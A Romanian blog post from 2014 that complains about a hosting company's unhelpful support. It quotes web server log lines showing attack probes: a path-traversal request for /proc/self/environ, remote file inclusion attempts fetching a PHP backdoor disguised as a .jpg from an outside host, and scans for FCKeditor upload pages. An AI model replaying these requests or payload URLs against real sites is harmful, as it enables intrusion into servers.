profesionist la firma de hosting

Marţi, 3 Iunie 2014 | 1 Comentariu

În ultima vreme s-au intensificat atacurile pe toate site-urile cu baze de date. Si nu numai, pentru că periodic găsesc prin log-uri scanări făcute, de regulă, de pe adrese IP din China. Lucrurile arată aşa:

107.6.89.250 – – [03/Jun/2014:10:45:35 +0300] “GET /Itemid,543../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1” 404 – “-” “Microsoft Internet Explorer/4.0b1 (Windows 95)”
107.6.89.250 – – [03/Jun/2014:10:50:33 +0300] “GET /Itemid,543test?? HTTP/1.1” 404 435 “-” “Microsoft Internet Explorer/4.0b1 (Windows 95)”
107.6.89.250 – – [03/Jun/2014:10:50:35 +0300] “GET /Itemid,543http://www.cflagier.free.fr/css/star.jpg?? HTTP/1.1” 404 435 “-” “Microsoft Internet Explorer/4.0b1 (Windows 95)”
107.6.89.250 – – [03/Jun/2014:10:50:36 +0300] “GET /Itemid,543http://www.cflagier.free.fr/css/star.jpg?? HTTP/1.1” 404 435 “-” “Microsoft Internet Explorer/4.0b1 (Windows 95)”

Ideea e simplă, de la adresa web din link se aduce un fisier cu extensia .jpg care de fapt e un script php. Odată copiat fişierul în home-directory pe site-ul atacat, acesta este apelat dintr-un bowser web şi treaba e gata. Asta se întâmplă dacă în home-directory este drept de scriere pentru “public”.

Descărcat pe computerul normal produce o alertă la antivirus:

treaba-cu-backdoor

sau aşa – aici se verifică doar dacă există vreun script vulnerabil:

27.150.235.76 – – [03/Jun/2014:09:21:27 +0300] “GET /bbadmin/editors/fckeditor/editor/filemanager/upload/test.html HTTP/1.1” 404 288 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
27.150.235.76 – – [03/Jun/2014:09:35:37 +0300] “GET /admin/system/editor/fckeditor/editor/fckeditor.html HTTP/1.1” 404 288 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
27.150.235.76 – – [03/Jun/2014:11:14:54 +0300] “GET /administrator/fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1” 404 288 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
27.150.235.76 – – [03/Jun/2014:12:04:41 +0300] “GET /js/fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1” 404 288 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)”
27.150.235.76 – – [03/Jun/2014:13:27:45 +0300] “GET /includes/editors/fckeditor/editor/filemanager/upload/test.html HTTP/1.1” 404 288 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )”

Dacă firma de hosting nu are meseriaşi care pricep ce se întâmplă, se poate ajunge ca – în cazul în care unul sau mai multe dintre site-urile de pe un hosting share este spart, resursele serverului să se epuizeze rapid. Şi în panoul de control să se vadă asta:

cpanel-consum-resurse-shared-hosting

În mod evident tot clienţii sunt nemulţumiţi pentru că toate site-urile merg foarte prost. Şi atunci tu, ca firmă care te pretinzi seriosă, ce faci? Îţi bagi capul în cur fără să te intereseze de clienţi, sau rezolvi problemele? Pentru că dacă, profesionist fiind, spui prostii de genul:

Suport: scriptul care consuma asa multe resurse e fisierul de index
Client: 🙂
Client: e fisierul din wordpress
Client: ce resurse sa consume?
Suport: eu va zic ce apare pe statistica
Client: e normal
Suport: acest script genereaza consumul
Client: nu ma intereseaza statistica
Client: ideea e ca nu e normal sa am procesor cu 100% cu un singur proces
Suport: in mod normal contul dvs ar avea nevoie de o gazduire dedicata

şi vorbim despre un site cu un WordPress banal, o temă simplă şi optimizat la maxim, deja dai impresia de neprofesionalism cronic.

Un comentariu la “profesionist la firma de hosting

Ai o altă opinie? O poți scrie aici!